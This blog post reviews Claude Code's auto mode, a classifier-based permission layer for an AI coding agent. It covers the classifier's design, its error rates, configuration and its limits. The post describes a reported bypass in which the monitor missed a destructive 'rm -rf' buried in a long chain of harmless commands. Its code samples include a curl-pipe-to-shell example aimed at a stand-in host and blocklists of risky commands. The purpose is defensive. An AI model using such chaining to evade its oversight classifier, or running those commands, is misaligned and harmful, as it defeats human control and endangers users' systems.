I watched Claude delete my staging database config on a Tuesday afternoon. Not maliciously. Not even carelessly. I had asked it to "clean up unused config files," and it did exactly what I asked. The problem was that I had launched it with --dangerously-skip-permissions, so there was no confirmation step. No pause. No "are you sure?" Just a file, gone, and me staring at a terminal realizing I had handed a power tool to an intern with no guardrails.
That was January. By March, Anthropic shipped something that should have existed from day one: Claude Code's auto mode. A middle ground between clicking "approve" on every single file read and letting an AI agent run unsupervised with root-level access to your entire project. The flag that should have scared you more than it did is finally getting a proper replacement.
Here is how it works, what it actually catches, and where it still falls short.
The Permission Problem Nobody Talked About
Before auto mode, Claude Code had two settings. Manual mode, where every tool call required your explicit approval. And --dangerously-skip-permissions, where nothing did.
Manual mode sounds responsible. In practice, it was theater.
Anthropic's own data tells the story: users approve 93% of manual permission prompts. Ninety-three percent. If you approve 93 out of 100 prompts, you are clicking "yes" reflexively. That is not security. That is muscle memory. You are not reading what the tool is about to do. You are not evaluating risk. You are performing a ritual that makes you feel safe while providing almost no actual protection.
I know this because I was one of those users. I would start a session intending to review every action carefully. By the fifteenth file read request, I was hitting Enter without looking. By the thirtieth, I had switched to --dangerously-skip-permissions because at least that was honest about what was happening. No pretense of oversight. Just speed.
The 7% of prompts that users did reject? Those were the ones that mattered. The destructive writes. The unexpected shell commands. The file deletions. But by the time one of those appeared in the stream, your attention was already gone. You had been trained by 93 approvals to stop paying attention.
This is the core insight behind auto mode: the old binary was broken. Not because manual approval is a bad idea in theory, but because humans are terrible at maintaining vigilance through repetitive, low-signal approval flows. We needed something that could distinguish the routine from the dangerous before asking for human input.
What Auto Mode Actually Is
You enable it with claude --enable-auto-mode, or you can cycle through modes with Shift+Tab during a session. It sits between manual and skip-permissions as a third option. The Anthropic engineering blog post describes it as a classifier-based approach, but that undersells the architecture. It is actually a two-layer system with three tiers of permission handling.
Think of it like fly-by-wire in aviation. A pilot flying a modern Airbus does not directly control the flight surfaces. They express intent through a sidestick, and a computer system interprets that intent, applies safety envelopes, and then moves the ailerons and elevators. The pilot can still override. The computer can still refuse a command that would stall the aircraft. Neither is fully in control. Both are necessary.
Auto mode works the same way. You express intent to Claude. Claude generates tool calls. A classifier system evaluates each tool call against safety rules. Low-risk actions proceed automatically. High-risk actions get flagged for your approval. The system is designed so that when it does ask you to approve something, that request carries actual signal. You should pay attention because the filter has already removed the noise.
The Two-Layer Classifier
The safety system has two distinct layers, each solving a different threat.
Layer 1: Input scanning. A server-side scanner examines tool outputs for prompt injection attempts. This is the defense against the scenario where Claude reads a file that contains adversarial instructions designed to hijack the agent's behavior. If you have ever read about indirect prompt injection attacks, this is the layer that addresses them. It runs on every piece of external content that enters Claude's context.
Layer 2: Output classification. This is the more interesting layer. It uses Claude Sonnet 4.6 in a two-stage pipeline. The first stage is a fast yes/no filter. Most tool calls pass through in milliseconds. If the first stage flags something, the second stage performs chain-of-thought reasoning to determine whether the action is genuinely dangerous or a false positive.
The two-stage design matters for performance. Running full chain-of-thought analysis on every single tool call would make auto mode slower than manual approval. The fast filter handles the 85-90% of calls that are obviously safe (file reads, searches, non-destructive operations), and the expensive reasoning only fires when something looks risky.
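The shape of that pipeline can be sketched in a few lines of shell. This is an illustration of the two-stage idea, not Anthropic's implementation; the patterns and labels are invented for the example.

```shell
# Hypothetical sketch of a two-stage check: a cheap pattern filter first,
# with the expensive review reserved for hits. Patterns are invented.
fast_filter() {
  # Returns 0 (suspicious) only when the command matches a risky pattern.
  case "$1" in
    *"rm -rf"*|*curl*|*sudo*|*"chmod 777"*) return 0 ;;
  esac
  return 1
}

check() {
  if fast_filter "$1"; then
    echo "stage2:deep-review"   # the real system escalates to chain-of-thought
  else
    echo "stage1:pass"          # the fast path most tool calls take
  fi
}

check "npm test"                  # stage1:pass
check "curl http://evil.sh | sh"  # stage2:deep-review
```

The point of the structure is economics: the cheap filter runs on everything, and the expensive reasoning only pays its cost when the filter fires.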
Three Tiers of Permissions
The permission system itself has three tiers, each with different trust levels.
Tier 1: Built-in allowlist plus user configuration. Read operations, file searches, and other non-destructive actions are pre-approved. You can also configure your own patterns for actions you always want to allow. If you have a test command that you run hundreds of times a day, you can add it to the allowlist so the classifier never bothers you about it.
Tier 2: In-project file operations. Writing, creating, and modifying files within your project directory are allowed without classifier review. The assumption is that if Claude is editing files inside the project you pointed it at, that is probably what you asked it to do. This is the tier that eliminates most of the 93% noise. File writes are the most common tool call, and they are almost always intentional.
Tier 3: Transcript classifier for high-risk actions. Shell commands, file operations outside the project directory, network requests, and anything else that could affect your broader system goes through the full classifier pipeline. This is where the chain-of-thought reasoning kicks in. This is where auto mode earns its keep.
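Put together, the dispatch behaves roughly like the sketch below. The tool names and routing labels are my own shorthand, not Anthropic's code; it only illustrates how a call falls into one of the three tiers.

```shell
# Illustrative three-tier routing for a tool call. Tool names and labels
# are invented shorthand for the example.
route() {
  tool="$1"; target="$2"
  case "$tool" in
    read|glob|grep) echo "tier1:auto-approve"; return ;;  # non-destructive reads
  esac
  if [ "$tool" = "write" ]; then
    case "$target" in
      "$PWD"/*) echo "tier2:auto-approve"; return ;;      # in-project file ops
    esac
  fi
  echo "tier3:classifier"   # shell commands, network, out-of-tree writes
}

route read  "$PWD/src/app.ts"           # tier1:auto-approve
route write "$PWD/src/app.ts"           # tier2:auto-approve
route write "/etc/hosts"                # tier3:classifier
route bash  "curl https://example.com"  # tier3:classifier
```

Notice that the only check in Tier 2 is "is the target inside the project directory" — which is exactly why the Tier 3 classifier has to carry all the weight for shell commands and anything that escapes the project root.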
You can inspect the full default ruleset by running claude auto-mode defaults, which dumps the JSON configuration. I recommend doing this before you enable auto mode for the first time. Know what you are trusting.
Setting It Up: A Practical Walkthrough
Getting started with auto mode takes about two minutes, but configuring it well takes longer. Here is what I recommend.
Step 1: Enable and Inspect
```shell
# Enable auto mode
claude --enable-auto-mode

# Check the default rules
claude auto-mode defaults
```

The defaults output is a JSON document that lists every rule the classifier uses. Read through it once. Pay attention to which shell commands are in the allowlist and which are not.
Step 2: Understand the Mode Cycling
During any Claude Code session, you can press Shift+Tab to cycle between three modes:
- Manual - Every tool call requires approval (the old default)
- Auto - Classifier-based approval (the new middle ground)
- Skip - No approval required (the old --dangerously-skip-permissions)
You can switch modes mid-session. This is genuinely useful. Start in auto mode for general work, switch to manual if you are about to do something sensitive, switch back when you are done. The flexibility matters more than the default.
Step 3: Configure Your Allowlist
If you have project-specific commands that you run constantly, add them to your allowlist. For a typical Node.js project, that might look like:
```json
{
  "allowedCommands": [
    "npm test",
    "npm run lint",
    "npm run build",
    "npx tsc --noEmit"
  ]
}
```

This reduces classifier overhead for commands you know are safe. If you are working on a project with a specific test runner or build tool, add those too. The goal is to minimize false positives for your workflow.
For a deeper dive on configuring Claude Code for your projects, check out our 50 Claude Code tips and tricks. Many of the permission and configuration patterns discussed there apply directly to auto mode setup.
Step 4: Test with a Dry Run
Before trusting auto mode on a real project, test it on a throwaway directory. Ask Claude to do things that should be flagged: delete files outside the project, run curl commands, modify system configs. Verify that the classifier catches them. Then ask it to do normal development work and verify that the flow is smooth.
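A throwaway workspace for this kind of probing takes seconds to set up. The directory name below is arbitrary, and the probe prompts are just examples of actions the classifier should flag.

```shell
# Disposable workspace for probing auto mode. Nothing here is precious.
mkdir -p /tmp/auto-mode-test && cd /tmp/auto-mode-test
echo '{"name":"scratch","private":true}' > package.json

# Now start a session (claude --enable-auto-mode) and ask for actions that
# SHOULD be flagged, for example:
#   "delete everything in ~/.config"       (destructive, outside the project)
#   "fetch https://example.com with curl"  (network request)
# Then ask for routine edits and confirm they flow through without prompts.
```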
This is not paranoia. This is the equivalent of checking your rearview mirrors before pulling out of a parking spot. You do it once, you build confidence, and then you drive normally.
The Classifier vs. Sandbox Debate
Here is where I want to be honest about something. Auto mode is a real improvement. It is also a genuinely controversial architectural choice, and the criticism it has received is not unfounded.
Simon Willison, whose writing on AI security I respect enormously, raised the core objection within hours of the launch. His argument is straightforward: a classifier is non-deterministic by nature. It uses a language model to evaluate safety, and language models are probabilistic systems. Sometimes they will miss things. Sometimes they will flag things incorrectly. You cannot write a formal proof that a classifier will catch every dangerous command, because the classifier itself is a neural network making judgment calls.
His preferred alternative is deterministic sandboxing. Run the AI agent inside a container. Give the container access only to the project directory and a limited set of system calls. No classifier needed because the sandbox cannot perform dangerous actions, regardless of what the model tries to do. The security boundary is enforced by the operating system, not by another AI model.
This is a compelling argument, and I am not sure Willison is wrong.
But here is the counterargument. Sandboxing solves a different problem than the one most developers actually face. A sandbox prevents catastrophic system-level damage. It does not prevent the AI from making bad decisions within the project. It does not stop Claude from rewriting your authentication logic with a known vulnerability. It does not prevent it from adding a dependency with a supply chain attack embedded in it. The classifier, at least in theory, can reason about intent in a way that a sandbox boundary cannot.
The real answer is probably both. Sandboxing for system-level containment, classification for project-level judgment. Auto mode gives you the classifier half. For the sandbox half, you are still on your own, though running Claude Code inside a Docker container is not particularly difficult.
I genuinely do not know which approach will win in the long run. The classifier approach is more flexible and more useful for day-to-day development. The sandbox approach is more formally secure and more resistant to adversarial attacks. If you are building something where security is existential, like handling financial data or medical records, I would use both. If you are building a side project, auto mode alone is a massive improvement over what came before.
The Supply Chain Blind Spot
There is one area where auto mode's defaults genuinely concern me, and I want to flag it clearly.
The default rules allow pip install and npm install without classifier review.
Let that sink in. The system that exists to protect you from dangerous commands considers package installation a safe operation. It is not. Package installation is one of the most significant attack vectors in modern software development. Typosquatting attacks, dependency confusion, malicious postinstall scripts: these are not theoretical threats. They happen constantly.
When Claude decides it needs a package to solve your problem, it will install it. In auto mode, that installation will proceed without your approval. If the package name is slightly misspelled, or if someone has published a malicious package with a similar name, you will not get a chance to intervene.
This is fixable. You can add npm install and pip install to your blocked commands list, forcing classifier review. I strongly recommend doing this:
```json
{
  "blockedCommands": [
    "npm install *",
    "pip install *",
    "yarn add *",
    "pnpm add *"
  ]
}
```

We wrote extensively about the broader security landscape of AI-assisted coding in our vibe coding security rules guide. The supply chain section is directly relevant here. Auto mode does not solve supply chain security. You still need lockfiles, you still need audit tools, and you still need to review what gets installed.
The Adversa AI Bypass (and What It Revealed)
In early April, security firm Adversa AI discovered a bypass in the classifier pipeline. When a single tool call contained more than 50 subcommands piped together, the classifier would fall back to a simplified evaluation mode that missed dangerous operations buried in the chain. A carefully crafted command like echo "harmless" && echo "still harmless" && ... (48 more) && rm -rf /important/directory could slip through.
Anthropic fixed this in version 2.1.90 by imposing a hard limit on command complexity and decomposing piped chains into individual evaluations. But the vulnerability revealed something important about the classifier approach: its failure modes are surprising. A sandbox fails predictably. You try to access something outside the sandbox, you get a permission denied error. A classifier fails in ways that require adversarial creativity to discover.
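The decomposition half of the fix is easy to picture. Here is a hedged sketch of the idea, not the shipped code: split on the chain operators and hand each piece to the classifier on its own (GNU sed is assumed for the newline replacement).

```shell
# Sketch of chain decomposition: break an &&/; chain of subcommands into
# individual commands so each one is classified separately. GNU sed assumed.
decompose() {
  printf '%s\n' "$1" | sed 's/ && /\n/g; s/ ; /\n/g'
}

chain='echo "harmless" && echo "still harmless" && rm -rf /important/directory'
decompose "$chain"
# The rm -rf now surfaces as its own line instead of hiding at the end of a
# long run of harmless echoes.
```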
This is not a reason to avoid auto mode. Every security system has failure modes. But it is a reason to treat auto mode as one layer in a defense-in-depth strategy, not as your entire security posture. If you are working on a project where an agent could cause real damage, read our guide on blocking AI agents from merging PRs. The principle is the same: give the agent enough power to be useful, but keep critical operations behind human gates.
The Numbers: What the Classifier Actually Catches
Let me share the performance data Anthropic published, because it tells an interesting story.
The full pipeline false positive rate is 0.4%. That means for every 1,000 safe tool calls, only 4 will be incorrectly flagged for human review. This is excellent. It means auto mode will almost never interrupt you unnecessarily. When it asks for approval, you should take it seriously because it is almost certainly flagging something worth looking at.
The false negative rate on what Anthropic calls "overeager" commands is 17%. This means roughly 1 in 6 commands that the classifier should flag will slip through without human review. These are commands that are not catastrophically dangerous but are more aggressive than what the user probably intended. Think git push --force when you meant git push, or rm -r on a directory you expected to only partially clean.
Seventeen percent sounds alarming until you compare it to the alternative. With --dangerously-skip-permissions, the false negative rate is 100%. Everything slips through. With manual mode, the false negative rate depends entirely on your attention span, and we have already established that 93% of the time you are not paying attention.
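To make that comparison concrete, here is the arithmetic over an assumed workload. The 2% risky-call rate is my illustrative assumption; the 0.4% and 17% figures are the published rates.

```shell
# Expected outcomes per 10,000 tool calls. The 2% risky-call rate is an
# assumed workload figure for illustration; 0.4% FP and 17% FN are the
# published auto-mode rates.
awk 'BEGIN {
  calls = 10000; risky = calls * 0.02; safe = calls - risky
  printf "needless interruptions (auto): %d\n", safe * 0.004
  printf "risky calls missed (auto):     %d\n", risky * 0.17
  printf "risky calls missed (skip):     %d\n", risky
}'
```

Under those assumptions, auto mode interrupts you about 39 times needlessly and misses about 34 of the 200 risky calls, while skip-permissions misses all 200.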
Is 0.4% false positives and 17% false negatives good enough? For most development work, yes. For security-critical operations, probably not. This is the kind of judgment call that auto mode forces you to make explicitly, which is itself an improvement over the old binary.
The Team-Only Problem
There is one more thing worth discussing, and it is not technical. It is organizational.
Auto mode is currently available only on Team plans. It requires admin approval to enable. Enterprise and API access are coming but not here yet.
This creates a two-tier safety system. Teams that pay for the premium plan get the classifier. Individual developers, open source contributors, and hobbyists get the old binary: manual approval or skip permissions. The people who are most likely to use --dangerously-skip-permissions because they cannot afford to click through hundreds of approval prompts are the ones who do not get access to the safer middle ground.
I understand why Anthropic made this choice. The classifier has real compute costs; running Sonnet 4.6 on every tool call is not free. The Team plan pricing covers that cost. And requiring admin approval means organizations can make deliberate decisions about how much autonomy their developers give to AI agents.
But the effect is that the safety improvement is gated behind a paywall. Solo developers are stuck with the same broken binary they had before. I hope Anthropic finds a way to bring at least a basic version of auto mode to individual users. The 93% approval rate is not a Team-plan problem. It is a human problem.
My Setup After Two Weeks
I have been running auto mode on my primary projects for about two weeks now. Here is what my configuration looks like and what I have learned.
I keep auto mode as my default but switch to manual for three specific scenarios: database migrations, deployment scripts, and anything touching authentication logic. The classifier is good, but these are areas where I want to read every command myself. The cost of a mistake is too high.
I have added npm install, pip install, and all package manager variants to my blocked commands list. Every package installation gets my explicit review. This has caught two cases where Claude suggested installing packages I had never heard of. Both turned out to be legitimate, but the review step gave me confidence.
I run Claude Code inside a Docker container for projects that touch production data. This gives me the sandbox layer that auto mode does not provide. The combination of classifier plus sandbox covers both the project-level judgment and the system-level containment.
I have auto mode defaults saved in my project's .claude/ directory so every team member gets the same configuration. Consistency matters when you are sharing an AI agent across a team.
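Sharing that configuration amounts to committing a file. The .claude/ project directory is Claude Code's settings convention; treat the exact autoMode keys below as an assumption drawn from this article's examples, and verify them against your installed version's claude auto-mode defaults output.

```shell
# Commit shared settings so every clone of the repo gets them. The autoMode
# keys are assumed from this article's examples; verify against your
# version's defaults before relying on them.
mkdir -p .claude
cat > .claude/settings.json <<'EOF'
{
  "autoMode": {
    "enabled": true,
    "blockedCommands": ["npm install *", "pip install *"]
  }
}
EOF
```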
The biggest change is psychological. In manual mode, I had trained myself to ignore approval prompts. In auto mode, when the classifier flags something, I actually read it. The signal-to-noise ratio is high enough that approval requests feel meaningful instead of tedious. That alone might be the most important improvement.
Configuring Auto Mode for Your Workflow
Here is a reference configuration that balances productivity with security. Adjust it to your needs.
```json
{
  "autoMode": {
    "enabled": true,
    "allowedCommands": [
      "npm test",
      "npm run lint",
      "npm run build",
      "npm run dev",
      "npx tsc --noEmit",
      "git status",
      "git diff",
      "git log"
    ],
    "blockedCommands": [
      "npm install *",
      "pip install *",
      "yarn add *",
      "pnpm add *",
      "rm -rf *",
      "git push --force*",
      "chmod 777 *"
    ],
    "alwaysReviewPatterns": [
      "*.env*",
      "docker-compose*.yml",
      "Dockerfile*",
      "**/migrations/**"
    ]
  }
}
```

The alwaysReviewPatterns field is particularly useful. Any file matching these patterns will trigger classifier review even for Tier 2 in-project operations. I use it for environment files, Docker configs, and database migrations. These are files where a well-intentioned edit can still cause serious problems.
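It is worth internalizing how those patterns behave. The sketch below approximates the matching with plain shell case globs; the */migrations/* form stands in for the **/** recursive glob, a simplification I chose for the demo, and the real matcher's semantics may differ.

```shell
# Approximate the review patterns with shell case globs. The */migrations/*
# pattern stands in for **/migrations/** recursion, a simplification.
needs_review() {
  case "$1" in
    *.env*|docker-compose*.yml|Dockerfile*|*/migrations/*) echo review ;;
    *) echo tier2 ;;
  esac
}

needs_review ".env.local"                  # review
needs_review "docker-compose.prod.yml"     # review
needs_review "db/migrations/001_init.sql"  # review
needs_review "src/index.ts"                # tier2
```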
What Comes Next
Auto mode is version one of something that will evolve significantly. The classifier will get better. The false negative rate will drop. New tiers of permission handling will appear. Anthropic has hinted at project-specific safety profiles that learn from your approval history, essentially a classifier that adapts to your risk tolerance over time.
The more interesting question is whether other AI coding tools will adopt similar approaches. Right now, most competitors offer the same binary that Claude Code used to have: approve everything or approve nothing. If auto mode proves successful, and the early data suggests it will, I expect we will see classifier-based permission systems become standard across the industry.
The broader pattern here matters more than the specific implementation. We are moving from a world where AI agent safety was binary, either fully trusted or fully supervised, to a world where safety is graduated. Different actions carry different risk levels. Different contexts require different amounts of human oversight. The system should be smart enough to tell the difference.
That is what auto mode attempts. It does not attempt it perfectly. The supply chain blind spot is real. The team-only restriction is frustrating. The classifier-vs-sandbox debate is genuinely unresolved. Simon Willison might be right that deterministic boundaries are fundamentally more trustworthy than probabilistic classifiers.
But here is what I keep coming back to. The old system was not working. We know it was not working because 93% of the time, we were not using it. Auto mode is an honest attempt to build something that humans will actually use correctly, rather than something that is theoretically secure but practically ignored.
I will take an imperfect system that people actually engage with over a perfect system that everyone bypasses. That is not a security argument. That is a human nature argument. And in security, human nature always wins eventually.
If you are still running --dangerously-skip-permissions, switch to auto mode today. If you are still clicking through manual approvals on autopilot, switch to auto mode today. And if you are on auto mode already, go inspect your defaults, block your package managers, and treat the classifier as one layer in a stack, not the whole stack.
The conversation about how much autonomy we give AI agents is just getting started. Auto mode is not the final answer. But it is the first honest answer.